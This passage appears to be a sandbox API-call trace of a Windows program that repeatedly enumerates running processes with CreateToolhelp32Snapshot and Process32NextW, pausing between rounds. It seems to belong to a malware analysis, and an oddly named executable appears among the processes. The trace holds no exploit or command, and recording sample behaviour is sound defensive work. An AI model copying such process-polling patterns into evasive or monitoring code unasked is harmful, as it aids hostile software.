th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0221.562] Process32NextW (in: hSnapshot=0x230, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0221.562] Sleep (dwMilliseconds=0x64) [0221.660] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x234 [0221.662] Process32FirstW (in: hSnapshot=0x234, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.662] Process32NextW (in: hSnapshot=0x234, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0221.663] Process32NextW (in: hSnapshot=0x234, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0221.663] Process32NextW (in: hSnapshot=0x234, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.663] Process32NextW (in: hSnapshot=0x234, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0221.663] Process32NextW (in: hSnapshot=0x234, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.664] Process32NextW (in: hSnapshot=0x234, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0221.664] Process32NextW (in: hSnapshot=0x234, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0221.664] Process32NextW (in: hSnapshot=0x234, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0221.665] Process32NextW (in: hSnapshot=0x234, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0221.665] Process32NextW (in: hSnapshot=0x234, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.665] Process32NextW (in: hSnapshot=0x234, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.665] Process32NextW (in: hSnapshot=0x234, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.666] Process32NextW (in: hSnapshot=0x234, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.666] Process32NextW (in: hSnapshot=0x234, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.666] Process32NextW (in: hSnapshot=0x234, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0221.667] Process32NextW (in: hSnapshot=0x234, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.667] Process32NextW (in: hSnapshot=0x234, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.667] Process32NextW (in: hSnapshot=0x234, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0221.667] Process32NextW (in: hSnapshot=0x234, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0221.668] Process32NextW (in: hSnapshot=0x234, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0221.668] Process32NextW (in: hSnapshot=0x234, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0221.668] Process32NextW (in: hSnapshot=0x234, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.669] Process32NextW (in: hSnapshot=0x234, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0221.669] Process32NextW (in: hSnapshot=0x234, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0221.669] Process32NextW (in: hSnapshot=0x234, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0221.669] Process32NextW (in: hSnapshot=0x234, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0221.670] Sleep (dwMilliseconds=0x64) [0221.800] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x238 [0221.802] Process32FirstW (in: hSnapshot=0x238, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.802] Process32NextW (in: hSnapshot=0x238, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0221.802] Process32NextW (in: hSnapshot=0x238, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0221.802] Process32NextW (in: hSnapshot=0x238, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.803] Process32NextW (in: hSnapshot=0x238, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0221.803] Process32NextW (in: hSnapshot=0x238, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.803] Process32NextW (in: hSnapshot=0x238, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0221.804] Process32NextW (in: hSnapshot=0x238, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0221.804] Process32NextW (in: hSnapshot=0x238, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0221.804] Process32NextW (in: hSnapshot=0x238, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0221.804] Process32NextW (in: hSnapshot=0x238, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.805] Process32NextW (in: hSnapshot=0x238, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.805] Process32NextW (in: hSnapshot=0x238, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.805] Process32NextW (in: hSnapshot=0x238, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.806] Process32NextW (in: hSnapshot=0x238, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.806] Process32NextW (in: hSnapshot=0x238, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0221.806] Process32NextW (in: hSnapshot=0x238, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.806] Process32NextW (in: hSnapshot=0x238, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.807] Process32NextW (in: hSnapshot=0x238, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0221.807] Process32NextW (in: hSnapshot=0x238, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0221.807] Process32NextW (in: hSnapshot=0x238, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0221.808] Process32NextW (in: hSnapshot=0x238, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0221.808] Process32NextW (in: hSnapshot=0x238, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.808] Process32NextW (in: hSnapshot=0x238, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0221.808] Process32NextW (in: hSnapshot=0x238, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0221.809] Process32NextW (in: hSnapshot=0x238, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0221.809] Process32NextW (in: hSnapshot=0x238, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0221.809] Sleep (dwMilliseconds=0x64) [0221.942] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23c [0221.944] Process32FirstW (in: hSnapshot=0x23c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.944] Process32NextW (in: hSnapshot=0x23c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0221.945] Process32NextW (in: hSnapshot=0x23c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0221.945] Process32NextW (in: hSnapshot=0x23c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.945] Process32NextW (in: hSnapshot=0x23c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0221.945] Process32NextW (in: hSnapshot=0x23c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.946] Process32NextW (in: hSnapshot=0x23c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0221.946] Process32NextW (in: hSnapshot=0x23c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0221.946] Process32NextW (in: hSnapshot=0x23c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0221.947] Process32NextW (in: hSnapshot=0x23c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0221.947] Process32NextW (in: hSnapshot=0x23c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.947] Process32NextW (in: hSnapshot=0x23c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.947] Process32NextW (in: hSnapshot=0x23c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.948] Process32NextW (in: hSnapshot=0x23c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.948] Process32NextW (in: hSnapshot=0x23c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.948] Process32NextW (in: hSnapshot=0x23c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0221.949] Process32NextW (in: hSnapshot=0x23c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.949] Process32NextW (in: hSnapshot=0x23c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.949] Process32NextW (in: hSnapshot=0x23c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0221.949] Process32NextW (in: hSnapshot=0x23c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0221.950] Process32NextW (in: hSnapshot=0x23c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0221.950] Process32NextW (in: hSnapshot=0x23c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0221.950] Process32NextW (in: hSnapshot=0x23c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.951] Process32NextW (in: hSnapshot=0x23c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0221.951] Process32NextW (in: hSnapshot=0x23c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0221.951] Process32NextW (in: hSnapshot=0x23c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0221.951] Process32NextW (in: hSnapshot=0x23c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, 